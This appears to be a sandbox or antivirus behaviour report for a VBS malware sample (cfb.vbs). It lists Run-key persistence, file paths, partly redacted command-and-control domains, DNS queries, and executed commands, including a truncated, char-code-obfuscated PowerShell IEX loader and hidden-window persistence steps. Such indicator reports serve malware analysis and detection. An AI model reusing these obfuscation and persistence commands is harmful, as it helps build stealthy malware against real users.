Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%APPDATA%\cfb.vbs '
- C:\users\public\cfb.vbs
- %APPDATA%\cfb.vbs
- 'ex##ple.com':443
- 'ja####murphy.com':443
- DNS ASK ex##ple.com
- DNS ASK google.com
- DNS ASK ja####murphy.com
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\cfb.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$TeRRors789poRTers=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\cfb.vbs '' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "C:\Users\Public\cfb.vbs " "%APPDATA%\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$TeRRors789poRTers=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value '%APPDATA%\cfb.vbs '
- '<SYSTEM32>\cmd.exe' /c copy "C:\Users\Public\cfb.vbs " "%APPDATA%\" /Y